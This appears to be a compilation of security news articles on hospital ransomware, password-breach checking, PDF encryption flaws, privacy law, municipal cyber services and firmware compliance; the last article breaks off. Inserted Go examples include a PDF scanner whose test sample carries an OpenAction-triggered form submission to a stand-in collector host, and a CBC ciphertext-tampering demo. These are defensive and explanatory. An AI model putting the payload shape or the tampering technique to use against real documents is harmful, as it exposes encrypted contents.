STE WILLIAMS

Ransomware attacks paralyze, and sometimes crush, hospitals

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.

Encrypted to death

In related news, the crooks managed to kill one goose in the process of trying to get its golden eggs. A California medical practice that suffered a ransomware attack in early August announced on 18 September that patients’ personal healthcare data on both servers and backup hard drives were encrypted in the attack, and that it hasn’t been able to restore the records. As a result, it’s closing: the clinic will be out of business as of 17 December 2019.

There’s no sign yet that patient information was accessed, the center said, but it has notified patients and provided resources to assist them, including information about credit monitoring from credit reporting agencies and a toll-free call center to answer questions about the incident and related concerns.

What are they after?

The California medical center thinks that, possibly, it’s not the data the crooks were after. Rather, it’s just the cold, hard cash:

We believe it is likely the attacker only wanted money and not the information on our computers.

That could be wishful thinking, though, particularly given the data that was accessed:

While we have no reason to believe that anyone’s healthcare information was taken, the encrypted system contained electronic healthcare records which included patients’ names, addresses, dates of birth, medical insurance and related health information.

Medical records are valuable commodities on the dark web. Multiple studies have shown that healthcare is attacked more than any other industry, and it’s easy to see why: simply put, because that’s where the money is.

The profit can come through ransomware payments or by selling extremely profitable medical records.

According to account monitoring company LogDog, coveted Social Security Numbers were selling on the dark web for a measly $1 in 2016 – the same as a Facebook account. That pales in comparison with the asking price for medical data, which was selling for $50 and up.

Healthcare IT is just like every other kind, except it’s more critical. Lives are always at stake when it comes to access to healthcare IT, making the possibility of ransomware payments far more likely.

Responses

In Australia, the Victorian Government advisory said that Victoria Police and the Australian Cyber Security Centre are helping out the affected hospitals. The Victorian Cyber Incident Response Service – a service available 24/7 to respond to cyber-attacks on government computer systems – worked through the night to investigate the extent of server damage and to help the health centers respond to the attack.

As of Wednesday morning, the crook(s) who launched an attack on the medical centers in western Alabama hadn’t yet made a ransom demand.

A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment.

The centers didn’t say whether they’d pay up or not, but one assumes that the answer will be “go take a hike,” given that they’ve called in the Feds to work with their IT staff and that they’re working with vendors and consultants to restore their systems.

To pay or not to pay, that is the question

That’s always the question in a ransomware attack: Should an organization cough up the money? Or should it tough it out, knowing that lining the attackers’ pockets only encourages them to attack other mission-critical systems, be they at hospitals or government agencies, and that paying is no guarantee that the crooks won’t come back to gouge away more?

There appears to be a growing trend for victims to tell attackers they’re not playing ball. That’s what the US Conference of Mayors did in July, crafting a resolution calling on cities to not pay ransom to cyberattackers.

It’s non-binding, of course. Sometimes, organizations – most particularly in the healthcare sector – feel that they have little choice but to pay up. That’s not a good place to be, and there are things that can and must be done to help keep them from getting stuck like that.

How to protect yourself from ransomware

  • Pick strong passwords. And don’t re-use passwords, ever.
  • Make regular backups. They could be your last line of defense against a six-figure ransom demand. Be sure to keep them offsite where attackers can’t find them.
  • Patch early, patch often. Ransomware like WannaCry and NotPetya relied on unpatched vulnerabilities to spread around the globe.
  • Lock down RDP. Criminal gangs exploit weak RDP credentials to launch targeted ransomware attacks. Turn off RDP if you don’t need it, and use rate limiting, 2FA or a VPN if you do.
  • Use anti-ransomware protection. Sophos Intercept X and XG Firewall are designed to work hand in hand to combat ransomware and its effects. Individuals can protect themselves with Sophos Home.

For information about how targeted ransomware attacks work and how to defeat them, check out the SophosLabs 2019 Threat Report.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/D-Zw_aOxTlU/

Google’s Password Manager now checks for breached credentials

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.

The password manager is also available via a web interface, and it’s this online version that Google has updated with the new password checkup service. It scans your stored account credentials for three things: if they’ve been compromised, if they’ve been reused in more than one place, and if they’re weak. The check takes a couple of seconds and spits out a handy report.

This is a useful service, but it’s still one step away from flagging compromised passwords directly in the browser without any add-ons. That’s coming, though. A password alert system will reportedly warn the user if they enter website credentials that have turned up in Google’s database of compromised logins. It’s already available as a feature in the Canary release of Chrome 78, but users need to download that manually until the release becomes mainstream. They also need to manually enable the feature.

Google’s move shadows Firefox’s inclusion of a scanning service for saved logins in Firefox 70. That service checks against Troy Hunt’s Have I Been Pwned (HIBP) service, though, whereas Google’s online password checking service references its own database, gleaned from sources including the open web and the dark web.

There’s a strong need for these password checking mechanisms. In August, Google released a study of data from the Password Checkup extension, revealing that 1.5% of web logins use breached credentials. That might not sound like much, but it represents breached credentials on over 746,000 distinct domains.
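The article describes two designs for a breached-credential check: Google’s, which compares a hashed form of the credentials against its own database, and Firefox’s, which queries Have I Been Pwned. The Go program below is an added example, not code from Google, Mozilla or HIBP, and uses the k-anonymity range-query shape that the public HIBP Pwned Passwords API has (SHA-1 of the password, only the first five hex characters leave the client). It then runs the three checks the article attributes to the password manager (compromised, reused, weak) over a constructed vault. The breach corpus, the vault entries, the 12-character “weak” threshold and all function names are assumptions for the demo.

```go
package main

import (
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"strings"
)

// Constructed stand-in for a breached-credential corpus. A real service holds
// only hashes; the plaintexts exist here just to build the demo.
var breachCorpus = []string{"password", "123456", "letmein", "qwerty", "P@ssw0rd"}

// Credential is one entry in a password-manager vault.
type Credential struct{ Site, User, Password string }

// Finding is one problem reported for a vault entry: "breached", "reused" or "weak".
type Finding struct{ Site, Issue string }

// sha1Upper returns the uppercase hex SHA-1 of s, the form the HIBP range API uses.
func sha1Upper(s string) string {
	sum := sha1.Sum([]byte(s))
	return strings.ToUpper(hex.EncodeToString(sum[:]))
}

// rangeQuery is the server side of a k-anonymity range query: given the first
// five hex characters of a hash, return every suffix in the corpus sharing that
// prefix with its breach count. The server never sees the full hash, let alone
// the password.
func rangeQuery(prefix string) map[string]int {
	out := map[string]int{}
	for _, pw := range breachCorpus {
		if h := sha1Upper(pw); strings.HasPrefix(h, prefix) {
			out[h[5:]]++
		}
	}
	return out
}

// IsBreached is the client side: hash locally, send only the 5-char prefix,
// then compare the returned suffixes locally.
func IsBreached(password string) (bool, int) {
	h := sha1Upper(password)
	n, found := rangeQuery(h[:5])[h[5:]]
	return found, n
}

// AuditVault applies the three checks the article attributes to the password
// manager: compromised, reused across sites, and weak. "Weak" is an assumed
// stand-in rule (shorter than 12 characters); Google's real rule is not on the page.
func AuditVault(vault []Credential) []Finding {
	sitesBySecret := map[string][]string{}
	for _, c := range vault {
		sitesBySecret[c.Password] = append(sitesBySecret[c.Password], c.Site)
	}
	var findings []Finding
	for _, c := range vault {
		if breached, _ := IsBreached(c.Password); breached {
			findings = append(findings, Finding{c.Site, "breached"})
		}
		if len(sitesBySecret[c.Password]) > 1 {
			findings = append(findings, Finding{c.Site, "reused"})
		}
		if len(c.Password) < 12 {
			findings = append(findings, Finding{c.Site, "weak"})
		}
	}
	return findings
}

func main() {
	vault := []Credential{ // constructed sample vault
		{"shop.example", "alice", "password"},
		{"mail.example", "alice", "password"},
		{"bank.example", "alice", "lamp-otter-granite-42"},
	}
	for _, f := range AuditVault(vault) {
		fmt.Printf("%-14s %s\n", f.Site, f.Issue)
	}
}
```

The design point is in `IsBreached`: the comparison happens on the client, so the service learns only a prefix shared by many hashes. With a real corpus a prefix maps to hundreds of suffixes; with the five-entry corpus here it maps to at most one, which is enough to show the flow but not the anonymity set size.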

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/htCIKPrCE8I/

PDF encryption standard weaknesses uncovered

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.

Although conceptually simple, using something like PDF form submission or JavaScript to do this turns out to be complex.

First, the attacker would need to intercept or obtain a copy of the PDF in order to insert the pointers, and would need a channel through which to exfiltrate the stolen data without that being noticed, detected or blocked.

Another unpredictable limitation is the way numerous different PDF viewers process things like JavaScript in order to enforce security.
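The direct-exfiltration variant relies on an attacker adding an unencrypted Action object to a document that is otherwise encrypted. In a fully encrypted PDF every string and stream is ciphertext, so a readable URL or script body sitting in an action dictionary is a useful triage signal. The Go program below is an added example of that heuristic, not the researchers’ tooling or any viewer’s code; it flags printable literal strings after the `/URI`, `/JS` and `/F` (SubmitForm target) keys and notes whether `/OpenAction` or `/AA` is present, but only when the file declares an `/Encrypt` dictionary. The two PDF fragments are constructed, not real files, and the regular expressions are assumptions that a fuller scanner would replace with a proper object parser.

```go
package main

import (
	"fmt"
	"regexp"
)

// Finding records a readable action payload found inside an encrypted PDF.
type Finding struct {
	Key   string // key the string followed: URI, JS, or F (SubmitForm target)
	Value string
}

// Report is the result of ScanPDF.
type Report struct {
	Encrypted        bool
	HasOpenAction    bool      // /OpenAction or /AA present: something runs on open or on an event
	PlaintextActions []Finding // readable strings where only ciphertext should appear
}

var (
	encryptRe    = regexp.MustCompile(`/Encrypt\b`)
	openActionRe = regexp.MustCompile(`/(OpenAction|AA)\b`)
	// A literal string following an action key, made only of printable ASCII
	// (parentheses excluded). In a fully encrypted PDF every string is
	// ciphertext, so a readable value here means the object was added in the clear.
	actionStrRe = regexp.MustCompile(`/(URI|JS|F)\s*\(([ -'*-~]{4,})\)`)
)

// ScanPDF applies the heuristic to raw PDF bytes. Only encrypted documents are
// judged: an unencrypted PDF may legitimately carry plaintext actions.
func ScanPDF(pdf []byte) Report {
	r := Report{Encrypted: encryptRe.Match(pdf), HasOpenAction: openActionRe.Match(pdf)}
	if !r.Encrypted {
		return r
	}
	for _, m := range actionStrRe.FindAllSubmatch(pdf, -1) {
		r.PlaintextActions = append(r.PlaintextActions, Finding{string(m[1]), string(m[2])})
	}
	return r
}

// Constructed samples: minimal PDF fragments, not real files. The benign
// document's string is hex ciphertext; the tampered one gained an unencrypted
// SubmitForm action wired to /OpenAction, the shape the article describes.
const benignEncrypted = `%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
3 0 obj << /Title <9f2c41e6b07a3d5c8e1b> >> endobj
trailer << /Root 1 0 R /Info 3 0 R /Encrypt 5 0 R >>`

const tamperedEncrypted = `%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R >> endobj
3 0 obj << /Title <9f2c41e6b07a3d5c8e1b> >> endobj
6 0 obj << /Type /Action /S /SubmitForm /F (http://collector.invalid/post) >> endobj
trailer << /Root 1 0 R /Info 3 0 R /Encrypt 5 0 R >>`

func main() {
	for name, doc := range map[string]string{"benign": benignEncrypted, "tampered": tamperedEncrypted} {
		r := ScanPDF([]byte(doc))
		fmt.Printf("%-9s encrypted=%v openAction=%v plaintextActions=%v\n",
			name, r.Encrypted, r.HasOpenAction, r.PlaintextActions)
	}
}
```

Treat a hit as a reason to open the file in a viewer with scripting and form submission disabled, not as proof of tampering: `/F` is also used for ordinary file specifications, and a document encrypted with an Identity crypt filter for some objects can legitimately contain plaintext strings.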

Attack #2 – CBC gadgets

Because not all PDF viewers support unencrypted content in PDFs, the researchers tried a more involved technique that exfiltrates plaintext by manipulating the PDF’s cipher block chaining (CBC) encryption format using something called ‘malleability gadgets’.

In this attack, the researchers exploit the lack of integrity protection to modify the encrypted contents directly:

…an attacker can stealthily modify encrypted strings or streams in a PDF file without knowing the corresponding password or decryption key. In most cases, this will not result in meaningful output, but if the attacker, in addition, knows parts of the plaintext, they can easily modify the ciphertext in a way that after the decryption a meaningful plaintext output appears.

Fortunately – from an attacker’s point of view – the PDF AESV3 (AES256) specification defines 12 bytes of known plaintext…

The researchers tested both techniques against 27 popular PDF viewers and editors to see how successful they would be under real-world conditions, finding a surprising amount of variation between programs.

Nevertheless, all 27 were vulnerable to at least one variant on either attack method, including Adobe Acrobat, Foxit Reader, Evince, Okular, Chrome, and Firefox.
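The quoted passage is the textbook malleability of CBC mode: because the decryption of block i+1 is XORed with ciphertext block i, anyone who knows (or can guess, as with the 12 bytes the AESV3 spec fixes) the plaintext of a block can rewrite it by editing the preceding ciphertext block, at the cost of garbling that preceding block. The Go program below is an added example using only the standard library; it is not the researchers’ gadget construction and it does not reproduce the PDF key derivation. It shows the edit going through against bare AES-256-CBC, then shows the same edit rejected once the ciphertext carries an HMAC (encrypt-then-MAC), which is the integrity protection the article says the format lacks. The key, IV, plaintext, the `mac:` key-derivation label and all function names are constructed for the demo.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"fmt"
)

// Constructed demo key and IV. A real PDF derives its key from the password;
// the malleability shown here does not depend on how the key was obtained.
var (
	demoKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes: AES-256
	demoIV  = []byte("fixed-iv-for-dem")                 // 16 bytes
	// Three 16-byte blocks, so block boundaries line up with the text.
	demoPlain = []byte("BLOCK-0-HEADER..AMOUNT=00000100.BLOCK-2-TRAILER.")
	known     = []byte("AMOUNT=00000100.") // plaintext the attacker knows
	desired   = []byte("AMOUNT=99999999.") // plaintext the attacker wants instead
)

func cbcEncrypt(key, iv, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, len(plaintext)) // whole blocks only; no padding in this demo
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, plaintext)
	return out
}

func cbcDecrypt(key, iv, ciphertext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ciphertext)
	return out
}

// rewriteNextBlock is the malleability itself. In CBC, P[i+1] = D(C[i+1]) XOR C[i],
// so XORing C[i] with (known XOR desired) turns P[i+1] into desired without the
// key. Block i itself then decrypts to garbage.
func rewriteNextBlock(ciphertext []byte, i int, known, desired []byte) []byte {
	out := append([]byte(nil), ciphertext...)
	for j := 0; j < aes.BlockSize; j++ {
		out[i*aes.BlockSize+j] ^= known[j] ^ desired[j]
	}
	return out
}

// TamperUnauthenticated edits the demo ciphertext and returns what a receiver
// with no integrity check decrypts: the rewritten middle block and whether the
// first block survived (it does not).
func TamperUnauthenticated() (middle string, firstIntact bool) {
	ct := cbcEncrypt(demoKey, demoIV, demoPlain)
	pt := cbcDecrypt(demoKey, demoIV, rewriteNextBlock(ct, 0, known, desired))
	return string(pt[16:32]), bytes.Equal(pt[:16], demoPlain[:16])
}

// macKey derives a separate HMAC key from the encryption key (assumed KDF for the demo).
func macKey(key []byte) []byte {
	k := sha256.Sum256(append([]byte("mac:"), key...))
	return k[:]
}

// Seal is encrypt-then-MAC: ciphertext || HMAC-SHA256(iv || ciphertext).
func Seal(key, iv, plaintext []byte) []byte {
	ct := cbcEncrypt(key, iv, plaintext)
	mac := hmac.New(sha256.New, macKey(key))
	mac.Write(iv)
	mac.Write(ct)
	return mac.Sum(ct)
}

// Unseal verifies the tag before decrypting; any flipped ciphertext bit fails here.
func Unseal(key, iv, sealed []byte) ([]byte, bool) {
	if len(sealed) < sha256.Size {
		return nil, false
	}
	ct, tag := sealed[:len(sealed)-sha256.Size], sealed[len(sealed)-sha256.Size:]
	mac := hmac.New(sha256.New, macKey(key))
	mac.Write(iv)
	mac.Write(ct)
	if !hmac.Equal(tag, mac.Sum(nil)) {
		return nil, false
	}
	return cbcDecrypt(key, iv, ct), true
}

// TamperAuthenticated applies the same edit to a sealed message and reports
// whether the receiver accepted it.
func TamperAuthenticated() bool {
	sealed := Seal(demoKey, demoIV, demoPlain)
	n := len(sealed) - sha256.Size
	tampered := append(rewriteNextBlock(sealed[:n], 0, known, desired), sealed[n:]...)
	_, ok := Unseal(demoKey, demoIV, tampered)
	return ok
}

func main() {
	middle, intact := TamperUnauthenticated()
	fmt.Printf("CBC only: middle block now %q, first block intact: %v\n", middle, intact)
	fmt.Printf("with MAC: tampered message accepted: %v\n", TamperAuthenticated())
}
```

The garbled first block is why the paper needs “gadgets”: the attacker has to place the edited block where random bytes do not matter, or sacrifice a block whose contents are irrelevant. None of that helps once the receiver checks a MAC (or uses an AEAD mode such as AES-GCM) before decrypting, which is the direction the article says future PDF specifications must take.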

What does this mean?

As with other formats that share some of the PDF’s security characteristics (XML, S/MIME, and ePub for instance), there is clearly some work to do: AES-CBC on its own provides no integrity protection, and the format does nothing to add it.

This must be fixed in future PDF specifications and any other format encryption standard, without enabling backward compatibility that would re-enable CBC gadgets.

Thanks to the widespread use of TLS encryption, it would be difficult for attackers to intercept and modify PDFs as they move across a network or the internet, whether the documents themselves are encrypted or not. However, PDFs at rest have been shown to be vulnerable.

If you think it’s worth encrypting your PDFs and you want to be sure they haven’t been tampered with, use a respected third party encryption tool, like GPG.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/yigSKdsoe6I/

No federal privacy law will make it in the US this year, sources say

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the de facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data … or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.

During a Congressional hearing in February 2019, this is what Dave Grimaldi, executive vice president for public policy at Interactive Advertising Bureau, had to say about the CCPA’s requirement that businesses have to hand over consumers’ data when requested:

[If a business doesn’t meet the timeline], it is in the violation of the law. [Given the potential for thousands of requests,] that’s something smaller companies wouldn’t be able to deal with.

Without a federal law to save them from having to submit to the California law, tech companies, retailers, advertising firms and others dependent on collecting consumer data to track users and increase sales – think Google, Amazon, Facebook or Walmart, to name just a few – are worried that the strict requirements of the CCPA are going to tear a hole in their corporate pockets. They all collect data on shoppers, whether it’s to run their sites or to derive online data in order to provide “free” services in exchange for advertising at us.

Reuters quoted Gary Kibel, a partner specializing in technology and privacy at law firm Davis Gilbert, who said that complying with California law will be quite a challenge for such companies:

This will be tremendously challenging… companies need to really focus on complying with California now because there is not going to be a life raft from a federal level.

Sources involved in legislation negotiations told Reuters that a discussion draft might arrive before year’s end, but these are some of the issues still to be ironed out:

  • Is it sufficient to simply ask consumers to consent to collection of personally identifiable information (PII) and to give them the opportunity to opt out?
  • How will the new law be enforced?
  • How much information should be deemed private?
  • How should the law govern how consumer information gets shared with third parties?

A draft of the federal bill is expected to be released before year’s end, sources said. A draft of the House version of the bill could arrive within a few weeks, one source said.

The GDPR-ish CCPA

California’s law isn’t just for California businesses, of course. Businesses that do business or have customers, or potential customers, in California will still be on the hook, if they meet one of these criteria:

  • Has annual gross revenue of more than $25 million.
  • Receives, shares, or sells the personal information of more than 50,000 individuals.
  • Earns 50% or more of its annual revenue from selling consumers’ personal information.

Consumers’ rights under CCPA can be grouped into these general categories:

  1. Businesses must inform consumers of their intent to collect personal information.
  2. Consumers have the right to know what personal information a company has collected, where the data came from, how it will be used, and with whom it’s shared.
  3. Consumers have the right to prevent businesses from selling their personal information to third parties.
  4. Consumers can request that businesses remove their personal information.
  5. Businesses are prohibited from charging consumers different prices or refusing service, even if the consumer exercised their privacy rights.

We’re still waiting for California’s attorney general to issue regulations about the law, but we do know that each violation carries a $7,500 fine.

One of Reuters’ sources who’s pushing for a federal privacy law said that without it, the CCPA is going to hurt:

California will go into effect without Congress doing anything this year on the federal bill. That’s a big problem because of the business impact this will have.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Pjj93Rj42bA/

How the City of Angels Is Tackling Cyber Devilry

A new mobile app makes a cybersecurity threat lab available to more small businesses in Los Angeles.


Electricity. Water. Law enforcement. These are services companies and individuals expect to receive from municipal governments. The City of Los Angeles is adding another service to the list: cybersecurity intelligence. And some think the project by the City of Angels could be the model for other US cities to emulate in expanding the services they offer to their own citizens.

Since August 2017, the LA Cyber Lab has been providing cybersecurity assistance to small and midsize businesses in the city. By sharing threat information and providing training opportunities, the Cyber Lab has tried to provide smaller organizations with some of the cybersecurity advantages that larger organizations can afford.

In the first two years of the Lab’s operation, it built a standardized platform for accepting information from participating organizations and automating threat analysis reporting to those companies. Hundreds of organizations have participated in the program that Los Angeles Mayor Eric Garcetti, who chairs the Lab’s board of advisers, has said is critical for addressing cybersecurity with the appropriate sense of urgency.

Now the Cyber Lab has expanded its capabilities and mission with the introduction of a mobile platform that can be accessed by businesses and individuals.

“We’ve got a mobile platform that citizens can log onto, can become members [of the LA Cyber Lab], and ultimately do things like submit pieces of mail that might be suspicious and then actually get information back that typically would only be shared more in a corporate setting,” says Wendi Whitmore, vice president of X-Force Threat Intelligence at IBM Security.

IBM Security is a partner in the Cyber Lab. While there is obviously a financial relationship, Whitmore says each enjoys side benefits from IBM’s participation in other ways. IBM Security provides the analytical platform the lab uses for generating its reports, and Whitmore says the data from Cyber Lab clients enhances the global data set X-Force analysts use in their work.

For the past two years, clients have been able to share internal company data — like login data, internal Web traffic, and user account activity — with the Cyber Lab. In the workflow until last month, Lab analysts would then review the shared data, looking for various indicators of compromise, such as data that shows a compromised user account or phishing links in email messages.

Notice of a compromise would then be sent in an email message — one of a series of email messages sent approximately five times a week. With the new mobile and Web-based system, messages can be forwarded via an app to the lab, which will then notify the client of compromise via the app within a few hours.

All of the analysis and threat indication is provided at no cost to businesses in Los Angeles. In conversations at Black Hat USA 2019, lab management stressed that the lab, and the fact that it is free, is a recognition of the importance of small businesses in the economy of the city. And that importance is not limited to Los Angeles.

“I think the goal for everyone in this project is it really becomes a great example and a benchmark for other cities to learn from and take on,” Whitmore says. While there are other municipal cybersecurity programs, like New York City’s Cyber NYC, most of these focus on growing the local cybersecurity industry and workforce, not protecting local small businesses.

As threats like ransomware become more devastating for small businesses and small government units, other governments may well look to Los Angeles as a model. The real question may be which governments can afford to offer this particular service to their citizens — and which groups of citizens are willing to pay for the service through their taxes.


Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/theedge/how-the-city-of-angels-is-tackling-cyber-devilry/b/d-id/1335968?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cartoon Contest: Second Wind

Feeling creative? Submit your caption in the comments, and our panel of experts will reward the winner with a $25 Amazon gift card.

We provide the cartoon. You write the caption!

Submit your caption in the comments, and our panel of experts will reward the winner with a $25 Amazon gift card. The contest ends Oct. 31. If you don’t want to enter a caption, help us pick a winner by voting on the submissions. Click thumbs-up for those you find funny; thumbs-down, not so. Editorial comments are encouraged and welcomed.

Click here for contest rules. For advice on how to beat the competition, check out How To Win A Cartoon Caption Contest.


John Klossner has been drawing technology cartoons for more than 15 years. His work regularly appears in Computerworld and Federal Computer Week. His illustrations and cartoons have also been published in The New Yorker, Barron’s, and The Wall Street Journal.

Article source: https://www.darkreading.com/edge/theedge/cartoon-contest-second-wind/b/d-id/1335961?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

How FISMA Requirements Relate to Firmware Security

Federal guidelines can help all organizations pragmatically and meaningfully improve their firmware security.

Adversaries recently have noticed that firmware and hardware constitute a serious blind spot for most organizations. While firmware may have once been the domain of nation-state attackers, it’s now easier than ever for criminals to develop firmware-based attacks that bypass security and cause serious (even permanent) damage. While advances in firmware security mean that organizations no longer need specialized talent or manual analysis to protect their firmware, a risk remains.

Enter the Federal Information Security Management Act, or FISMA. While FISMA applies mainly to government agencies and companies doing business with the government, it is based on NIST standards that provide guidance on best practices for all organizations. Its guidance on firmware is worth the attention of both government and nongovernmental security and risk management teams. (Editor’s note: Eclypsium is one of several vendors that market firmware protection products.)

First and foremost, firmware clearly falls well within scope for FISMA compliance. The regulation’s far-reaching requirements are spelled out in two NIST documents. SP 800-37 lays out a Risk Management Framework (RMF), and SP 800-53 addresses Security and Privacy Controls. Both NIST documents identify firmware as a critical part of a security program. In fact, they consistently include firmware along with hardware and software when describing the components of technology and devices to be protected. The question isn’t whether to include firmware in a security program, but which firmware to include.

Understanding the Threat and Scope

In the first phase of the Risk Management Framework (RMF) Overview (“Prepare”), organizations are called to define their high-level risk strategy based on their unique mission, tolerance for risk, types of threats such as cyberattacks, and other factors. Given the high level of risk they carry, firmware security threats should be considered as part of these efforts. This requires an understanding of the scope and severity of these threats.

Firmware is the foundational code of a device. System firmware such as BIOS or UEFI runs before the operating system. Threats at this level can subvert security controls and assumptions made by the operating system or applications.

Firmware is also present in virtually every piece of hardware in a computer system, from the storage drives to the network adapters. Attackers have plenty of opportunity to eavesdrop on data stored on a system or transmitted over its network connections, or to disable the device altogether — all at the firmware level. To further exacerbate the problem, firmware threats subvert traditional security controls and survive common incident response processes. For example, attackers can persist in the firmware even if the operating system is reinstalled to a known, good version. All of this adds up to a high potential impact on a system’s confidentiality, integrity, and availability.

Choosing Security Controls for Firmware

Once agencies identify the systems to be protected, they must implement the proper security controls, as enumerated in NIST SP 800-53. The following families of security and privacy controls identified in the document may naturally apply to firmware security:

  • SI-System and Information Integrity
  • SA-Systems and Services Acquisition
  • CM-Configuration Management
  • AC-Access Control
  • RA-Risk Assessment
  • IR-Incident Response
  • MA-Maintenance

A Call to Arms

Many of the controls specifically call out firmware security. For example, Configuration Management states the importance of only using updates that are cryptographically signed. As examples, the document identifies “firmware version updates, patches, service packs, device drivers, and basic input output system (BIOS) updates.”

Control SI-7 also addresses firmware, along with software and information integrity. The Control specifically addresses the need to ensure the integrity of the system boot process as well as the integrity of the boot firmware.

Section MA-3 of SP 800-53 also demands that organizations consider firmware security, this time with respect to the tools administrators use to service a system. According to the document, maintenance tools can include hardware, software, and firmware items that are “potential vehicles for transporting malicious code, intentionally or unintentionally, into a facility and subsequently into systems.”

Firmware is explicitly within the scope of FISMA. More importantly, because of ongoing efforts across the industry, the cost of including firmware protections into a security program is now lower than ever. With open source and commercial tools available, organizations can now deploy firmware security at scale in the supply chain, in operations, and in incident response. Armed with an understanding of the severity and scope of the firmware threat, organizations can determine the proper controls required to comply with FISMA and — perhaps more importantly — strengthen their firmware security in a noticeable, practical way.


John is VP of R&D at Eclypsium, the industry’s leading enterprise firmware protection platform. John has extensive history in hardware and firmware threats from experience at Intel and the United States government. At Intel he served as the Director of Advanced Threat Research, …

Article source: https://www.darkreading.com/risk/how-fisma-requirements-relate-to-firmware-security-/a/d-id/1335913?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

20M Russians’ Personal Tax Records Exposed in Data Leak

An unprotected Elasticsearch cluster contained personally identifiable information on Russian citizens from 2009 to 2016.

A database holding more than 20 million Russian tax records was found unprotected, leaving personal tax data accessible to anyone with a web browser, researchers reported this week.

The AWS Elasticsearch cluster contained data on Russian citizens spanning 2009 to 2016, according to Comparitech, which partnered with security researcher Bob Diachenko to investigate the leak. No password or any authentication was needed to access the cluster, which has now been taken offline. Researchers cannot confirm whether data was taken.

